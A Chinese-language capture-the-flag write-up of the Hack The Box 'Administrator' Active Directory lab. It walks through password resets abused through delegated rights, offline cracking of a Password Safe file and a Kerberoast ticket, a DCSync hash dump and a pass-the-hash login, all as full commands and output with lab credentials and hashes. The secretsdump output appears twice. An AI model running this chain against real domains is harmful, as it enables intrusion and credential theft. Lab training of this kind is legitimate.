文章目录
- 靶机信息
- 域环境初步信息收集与权限验证
- FTP 登录尝试
- SMB 枚举尝试
- WinRM 登录olivia
- 域用户枚举
- 获取Michael权限
- BloodHound 提取域信息
- GenericAll
- 获取Benjamin权限
- ForceChangePassword
- ftp登录benjamin
- 获取Emily权限
- pwsafe+hashcat
- 获取Ethan权限
- 获取管理员(Administrator)权限
HTB–Administrator
靶机信息
一台windows机器 难度:medium
As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password: ichliebedich
用户名:Olivia
密码:ichliebedich
目标:获得一个用户flag和一个管理员flag
域环境初步信息收集与权限验证
首先通过 Nmap 扫描所有端口,确定其开放的服务和潜在入口点
┌──(root㉿kali)-[/HTB/Administrator]
└─# nmap --min-rate 10000 -p- 10.10.11.42
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-01 15:38 CST
Nmap scan report for 10.10.11.42
Host is up (0.17s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-13 20:17:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
FTP 登录尝试
利用所给的账户名'Olivia'和密码'ichliebedich',尝试ftp登录,但由于 “Home directory inaccessible” 的错误,FTP 登录失败
┌──(root㉿kali)-[/HTB/Administrator]
└─# ftp 10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
Name (10.10.11.42:kali): Olivia
331 Password required
Password:
530 User cannot log in, home directory inaccessible.
ftp: Login failed
SMB 枚举尝试
SMB 是一种网络文件共享协议,允许应用程序通过网络读取和写入文件、请求远程服务以及进行其他网络操作。
利用提供的账号密码,使用CrackMapExec工具对 SMB 服务进行枚举,验证提供的凭据是否可用,并查看是否存在有用的共享目录。
CrackMapExec 是一个常用的渗透测试工具,主要用于 Windows 网络的枚举和利用。它特别适合对 SMB、RDP 和 WinRM 服务进行广泛扫描、认证、执行命令和枚举共享目录等操作
结果显示,用户 Olivia 的 SMB 登录有效,但未发现有用的共享目录,仅能读取常见的 NETLOGON 和 SYSVOL
┌──(root㉿kali)-[/HTB/Administrator]
└─# crackmapexec smb 10.10.11.42 -u 'Olivia' -p 'ichliebedich' --shares
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\Olivia:ichliebedich
SMB 10.10.11.42 445 DC [+] Enumerated shares
SMB 10.10.11.42 445 DC Share Permissions Remark
SMB 10.10.11.42 445 DC ----- ----------- ------
SMB 10.10.11.42 445 DC ADMIN$ Remote Admin
SMB 10.10.11.42 445 DC C$ Default share
SMB 10.10.11.42 445 DC IPC$ READ Remote IPC
SMB 10.10.11.42 445 DC NETLOGON READ Logon server share
SMB 10.10.11.42 445 DC SYSVOL READ Logon server share
WinRM 登录olivia
WinRM 是 Microsoft 提供的远程管理协议,允许远程执行命令、启动进程、管理系统设置等,类似于 Unix 系统中的 SSH
使用 CrackMapExec 验证目标主机的WinRM 服务(端口 5985),发现凭据有效并成功登录。
返回结果表明可以通过 WinRM 获取远程访问权限
┌──(root㉿kali)-[/HTB/Administrator]
└─# crackmapexec winrm 10.10.11.42 -u 'Olivia' -p 'ichliebedich'
SMB 10.10.11.42 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
HTTP 10.10.11.42 5985 DC [*] http://10.10.11.42:5985/wsman
WINRM 10.10.11.42 5985 DC [+] administrator.htb\Olivia:ichliebedich (Pwn3d!)
使用evil-winrm登录,使用 evil-winrm 进一步获取目标主机的权限和用户信息
并且通过运行 whoami /all 命令查看用户权限
┌──(root㉿kali)-[/home/kali/Desktop]
└─# evil-winrm -i 10.10.11.42 -u 'Olivia' -p 'ichliebedich'
*Evil-WinRM* PS C:\Users\olivia\Documents> whoami /all
----------------
User Name SID
==================== ============================================
administrator\olivia S-1-5-21-1088858960-373806567-254189436-1108
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
结果发现 Olivia 用户具有基本的操作权限,并且拥有 SeMachineAccountPrivilege,允许其将计算机帐户添加到域中。
域用户枚举
成功登录目标主机后,使用 net user 命令对域内的用户进行枚举。列出当前域控制器上存在的所有用户账户。
*Evil-WinRM* PS C:\Users\olivia\Documents> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator alexander benjamin
emily emma ethan
Guest krbtgt michael
olivia
olivia为当前使用的用户,其余为域内的其他用户
获取Michael权限
BloodHound 提取域信息
使用工具bloodhound.py从域中提取信息
BloodHound工具链接:https://github.com/BloodHoundAD/BloodHound/releases
┌──(root㉿kali)-[/HTB/Administrator]
└─# python /HTB/BloodHound/bloodhound.py -d administrator.htb -ns 10.10.11.42 -u 'olivia' -p ichliebedich -c All --zip
NFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.administrator.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 01M 30S
INFO: Compressing output into 20241205094659_bloodhound.zip
运行此命令后,我们获得了压缩包 20241205094659_bloodhound.zip,它包含了域中的所有关键信息。接下来,我们使用sudo neo4j start命令启动数据库,并使用 bloodbound命令进入工具。将得到的zip压缩包拖入到Bloodhound中上传文件。
我们当前用户为olivia,因此查看一下节点信息,olivia有一个First Degreee object control(一级对象控制,接下来简称FDOC),点击它可以看到olivia对用户michael拥有GenericAll权限。
GenericAll
GenericAll 权限相当于“完全控制”权限,意味着 olivia 可以完全控制 michael 用户,包括修改密码和组成员等操作。
使用evil-winrm登录olivia用户,修改域内用户michael的密码为michael
*Evil-WinRM* PS C:\Users\olivia\Documents> net user michael michael /domain
The command completed successfully.
成功登录,拿下michael用户
┌──(root㉿kali)-[/HTB/Administrator]
└─# evil-winrm -i 10.10.11.42 -u 'michael' -p 'michael'
*Evil-WinRM* PS C:\Users\michael\Documents> whoami
administrator\michael
获取Benjamin权限
ForceChangePassword
打开bloodhound,查看michael用户,发现该用户也有一个FDOC,并且该FDOC对benjamin用户具有ForceChangePassword权限,即可以强制更改benjamin的密码。
ftp登录benjamin
在bloodhound中查看benjamin没有任何权限,但是他是share Moderator组的成员,可以尝试一下ftp连接
接下来使用ftp登录michael账户,
┌──(root㉿kali)-[/HTB/Administrator]
└─# rpcclient -U michael 10.10.11.42
Password for [WORKGROUP\michael]:
rpcclient $> setuserinfo2 benjamin 23 'benjamin'
rpcclient $> exit
┌──(root㉿kali)-[/HTB/Administrator]
└─# ftp benjamin@10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>
成功拿下benjamin权限
获取Emily权限
ftp登录之后,查看一下当前目录下的文件,发现一个备份文件Backup.psafe3,将它下载下来
ftp> dir
ftp> binary #切换成二进制模式传输文件
200 Type set to I.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||51246|)
125 Data connection already open; Transfer starting.
100% |**********************************************************************************************| 952 0.77 KiB/s 00:00 ETA
226 Transfer complete.
952 bytes received in 00:01 (0.77 KiB/s)
pwsafe+hashcat
接下来使用pwsafe打开文件,发现需要密码
pwsafe工具链接:https://github.com/pwsafe/pwsafe/releases
使用hashcat的psafe3选项,同时时候5200模式进行破解。字典选择rockyou
rockyou字典链接:https://github.com/zacheller/rockyou
┌──(root㉿kali)-[/HTB/Administrator]
└─# hashcat -m 5200 Backup.psafe3 rockyou.txt
hashcat (v6.2.6) starting
Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 1 sec
Backup.psafe3:tekieromucho
成功爆破出密码:tekieromucho,里面保存了用户alexander、emily、emma的密码
得到emily的密码为:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
使用evil-winrm登录emily用户
┌──(root㉿kali)-[/HTB/Administrator]
└─# evil-winrm -i 10.10.11.42 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents> whoami
administrator\emily
成功拿下emily权限,进入桌面目录,拿下第一个flag
*Evil-WinRM* PS C:\Users\emily\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\emily\Desktop> dir
Directory: C:\Users\emily\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/30/2024 2:23 PM 2308 Microsoft Edge.lnk
-ar--- 12/7/2024 12:20 AM 34 user.txt
*Evil-WinRM* PS C:\Users\emily\Desktop> cat user.txt
888ac3b3d60b08fa502ca90c9e90d506
获取Ethan权限
再次查看bloodhound,emily有一个FDOC,对用户ethan拥有GenericWrite权限。
在 Active Directory (AD) 环境中,GenericWrite 是一种权限,允许攻击者对目标账户的属性进行修改。
这里介绍一下Kerberoasting攻击
Kerberos 协议在处理身份验证时,允许域内用户为拥有
SPN(Service Principal Name,标识服务实例的唯一名称) 的账户请求服务票据。这些票据通常是由账户的 NTLM 哈希加密生成的,只要域账户注册了
SPN,攻击者就可以使用Kerberos请求服务票据并提取票据。因此攻击者可以通过离线破解服务票据(例如使用工具PowerView或GetUserSPNs.py)间接得到目标账户的密码。
但是这里我们没有看到ethan用户注册SPN,因此我们只能通过GenericWrite为ethan用户创建一个SPN,然后请求一个票据并使用targetedKerberoast.py破解它。
targetedKerberoast.py下载链接:https://github.com/ShutdownRepo/targetedKerberoast
先更新一下时间,不然会有时差,导致破解失败
┌──(root㉿kali)-[/HTB/Administrator]
└─# ntpdig 10.10.11.42
2024-12-07 19:24:32.486796 (+0800) +57577.625273 +/- 0.706782 10.10.11.42 s1 no-leap
┌──(root㉿kali)-[/HTB/Administrator]
└─# ntpdate 10.10.11.42
2024-12-07 19:24:41.787024 (+0800) +57578.378741 +/- 0.419693 10.10.11.42 s1 no-leap
CLOCK: time stepped by 57578.378741
接下来进行破解
┌──(root㉿kali)-[/HTB/Administrator]
└─# python targetedKerberoast.py -d administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$049e887c457cf593f6585938d813f0e9$e52df94e29cff8fd07770680c4272fe8dca87da8fd11e36c2167e2c9abcd3b1e5e24227211f06ed8277388f30a0b935ed733f1eaf9d2fd5340e8e5b19fd51e7825d8059a6fffab4d0644edca80a778a17cf688e7077efee48fe36a0530d5e713ef48b08f2c44c2cd556614e598a575d6c303f7cb8653e6ec224e4d94eff3fa7ae48a18cc155dfbc938d6f8c33ec6a9765f1cdbacaa585b59611a54088ccec70d450cea352631f602c12cdf2626b9642145806842cd86220632bf1c0332501683640a749d5dc579d74ce433ce6440fa0ef4269d23131e0b75c25c22cc71a96bdbe972caf10d594fb8b9996eefc45dd2465fcb00c2c407aefaae2e107e4a9e3e643dd4937392ce935f8095f9f38cd7772266cad8ca827707967db5bbef143285a424965157937436208b3862e5560b2bd65a220e38c99414aa2dbee9efc0dd30863df2f239c63896a77b69b132f68416efcb7e9b384c8e8ebe9346f4a49eedec7470414459d3cdc096d4743ad4f194b30c44cd7e70aa297cfd628a3033c37725dbd9a4152fbb218b62d51a118f70eca8d893b50af2740763d0738852f9c192bc7396f653ff093256103b22874762e7d24fd5b2331e4524f32e8c1c9f00e9d88ba44017dddf86483bb076776de00d0779f5760be3979fb7af5a9807f297dcbdc2b77be04a076fb64a508b375a05b19088dad070771529fdc6b039f014214276a991eef28734b6fbc919c0972e12189487e824a35bd9e94bf6c61e7a274f1eb90569c9e2c0c7c96b5c75e9d084f8f426b9b769f5a61961a03184357309acc34f7cd8ba64c800c0303357644e6f844575cc9ed989b17cf91c1ffcc6bd0b4524927708c024868eb86cf5d9a28ca47dcbbbb2204d7836d4aee434c8e306efa14b0ce84983d489978809d3152780493b3c5ee908cf9d1d76ce7923d8c42f70c1ce78e73bfe45eb9c7a55e4906653d272720a2fcf2b92789c5a70f3306ade5a0dcedc86accf69bf25f40dc45cb70fc6f3eb166283e4380023a59639a99041803e0b9b013463b996f4c9ffc860f2498ba21bf8a4388592056b41522639c97b13c9809625bf8223c86c2e43ddd1c28d005dcdec42c5569e1a1e037a6987788c4a4cf549f66fd9a49fe1cecce548774c540e16633c7583eb26f16161900ab98c5abc652fb49a045f93a514740a3f5fc4eec9ecb59b23f6f96e96fb3b0b8a830c3746f99117b942246fcf0ddd10ef5e3472ad230f10eee854e371f6abd5e47a5d4f434b64ce3ab624e0ec2ecdd22c2e706611bc7f5a428ba5dd9d5b89c596b96436ee1a44e0f911bf923a0395d8225c59d9698fe52ac37850927d216eac82fe88e8acb5c4cc13cf2346694407698fce8449922d6cfc02192f3b415161f51e3f43355ed9619aeeff9b790950c50b23ef35961fcc6190fad445ceb02e757d5b18ef6238f092518429e2a45c71388371d6a6079f15c5a9cbb4baa03a850e217b2ab74ed9e6f1c3589dbae62495368360099394563b0679aaf4726968be9efe2f940c530155890b
现在有了krb5t哈希值,使用hashcat破解一下
┌──(root㉿kali)-[/HTB/Administrator]
└─# hashcat krb5t rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$049e887c457cf593f6585938d813f0e9$e52df94e29cff8fd07770680c4272fe8dca87da8fd11e36c2167e2c9abcd3b1e5e24227211f06ed8277388f30a0b935ed733f1eaf9d2fd5340e8e5b19fd51e7825d8059a6fffab4d0644edca80a778a17cf688e7077efee48fe36a0530d5e713ef48b08f2c44c2cd556614e598a575d6c303f7cb8653e6ec224e4d94eff3fa7ae48a18cc155dfbc938d6f8c33ec6a9765f1cdbacaa585b59611a54088ccec70d450cea352631f602c12cdf2626b9642145806842cd86220632bf1c0332501683640a749d5dc579d74ce433ce6440fa0ef4269d23131e0b75c25c22cc71a96bdbe972caf10d594fb8b9996eefc45dd2465fcb00c2c407aefaae2e107e4a9e3e643dd4937392ce935f8095f9f38cd7772266cad8ca827707967db5bbef143285a424965157937436208b3862e5560b2bd65a220e38c99414aa2dbee9efc0dd30863df2f239c63896a77b69b132f68416efcb7e9b384c8e8ebe9346f4a49eedec7470414459d3cdc096d4743ad4f194b30c44cd7e70aa297cfd628a3033c37725dbd9a4152fbb218b62d51a118f70eca8d893b50af2740763d0738852f9c192bc7396f653ff093256103b22874762e7d24fd5b2331e4524f32e8c1c9f00e9d88ba44017dddf86483bb076776de00d0779f5760be3979fb7af5a9807f297dcbdc2b77be04a076fb64a508b375a05b19088dad070771529fdc6b039f014214276a991eef28734b6fbc919c0972e12189487e824a35bd9e94bf6c61e7a274f1eb90569c9e2c0c7c96b5c75e9d084f8f426b9b769f5a61961a03184357309acc34f7cd8ba64c800c0303357644e6f844575cc9ed989b17cf91c1ffcc6bd0b4524927708c024868eb86cf5d9a28ca47dcbbbb2204d7836d4aee434c8e306efa14b0ce84983d489978809d3152780493b3c5ee908cf9d1d76ce7923d8c42f70c1ce78e73bfe45eb9c7a55e4906653d272720a2fcf2b92789c5a70f3306ade5a0dcedc86accf69bf25f40dc45cb70fc6f3eb166283e4380023a59639a99041803e0b9b013463b996f4c9ffc860f2498ba21bf8a4388592056b41522639c97b13c9809625bf8223c86c2e43ddd1c28d005dcdec42c5569e1a1e037a6987788c4a4cf549f66fd9a49fe1cecce548774c540e16633c7583eb26f16161900ab98c5abc652fb49a045f93a514740a3f5fc4eec9ecb59b23f6f96e96fb3b0b8a830c3746f99117b942246fcf0ddd10ef5e3472ad230f10eee854e371f6abd5e47a5d4f434b64ce3ab624e0ec2ecdd22c2e706611bc7f5a428ba5dd9d5b89c596b96436ee1a44e0f911bf923a0395d8225c59d9698fe52ac37850927d216eac82fe88e8acb5c4cc13cf2346694407698fce8449922d6cfc02192f3b415161f51e3f43355ed9619aeeff9b790950c50b23ef35961fcc6190fad445ceb02e757d5b18ef6238f092518429e2a45c71388371d6a6079f15c5a9cbb4baa03a850e217b2ab74ed9e6f1c3589dbae62495368360099394563b0679aaf4726968be9efe2f940c530155890b:limpbizkit
借助DCSync,使用impacket-secretsdump转储域控制器上的所有密码
┌──(root㉿kali)-[/HTB/Administrator]
└─# impacket-secretsdump ethan:limpbizkit@10.10.11.42
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:572eda5f1e26af9507cbe100f5e05f70:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:572eda5f1e26af9507cbe100f5e05f70:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:8dc537c77bd919cc78dd0a50c96ddb84e9cd05b3dfe1746606cf781b2d2b034c
administrator.htb\michael:aes128-cts-hmac-sha1-96:5431bff0c178b1929b1d3f75df76e610
administrator.htb\michael:des-cbc-md5:2a4c9b1a6802072a
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:9bb89823c8c2b20787ae2a3f5078b9c1660de5df5e13fb10cfc29d2634b98676
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:bdd3ca10646fdaaa820dabcf80248d0c
administrator.htb\benjamin:des-cbc-md5:cbeabaa2dae343a2
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...
获取管理员(Administrator)权限
现在我们已经获取了 ethan 的密码,使用 BloodHound 检查他的权限。发现 ethan 的 FDOC权限间接赋予了他在域控制器 (Domain Controller, DC) 上的 DCSync权限。
DCSync 是一种滥用 Active Directory (AD) 复制机制的攻击技术。拥有 DCSync 权限的用户可以模拟域控制器,向其他 DC 请求复制敏感数据,如 NTLM 哈希和 Kerberos 密钥。
借助DCSync,使用impacket-secretsdump转储域控制器上的所有密码
┌──(root㉿kali)-[/HTB/Administrator]
└─# impacket-secretsdump ethan:limpbizkit@10.10.11.42
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:572eda5f1e26af9507cbe100f5e05f70:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:572eda5f1e26af9507cbe100f5e05f70:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:8dc537c77bd919cc78dd0a50c96ddb84e9cd05b3dfe1746606cf781b2d2b034c
administrator.htb\michael:aes128-cts-hmac-sha1-96:5431bff0c178b1929b1d3f75df76e610
administrator.htb\michael:des-cbc-md5:2a4c9b1a6802072a
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:9bb89823c8c2b20787ae2a3f5078b9c1660de5df5e13fb10cfc29d2634b98676
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:bdd3ca10646fdaaa820dabcf80248d0c
administrator.htb\benjamin:des-cbc-md5:cbeabaa2dae343a2
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...
现在已经拥有了Administrator的哈希值,使用evil-winrm登录
┌──(root㉿kali)-[/home/kali/Desktop/secretsdump.py-main]
└─# evil-winrm -i 10.10.11.42 -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
administrator\administrator
成功登录administrator用户,切换到桌面目录,发现root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/7/2024 12:20 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
733c7927dc034b6e5562e66f7c8b39e5
1111
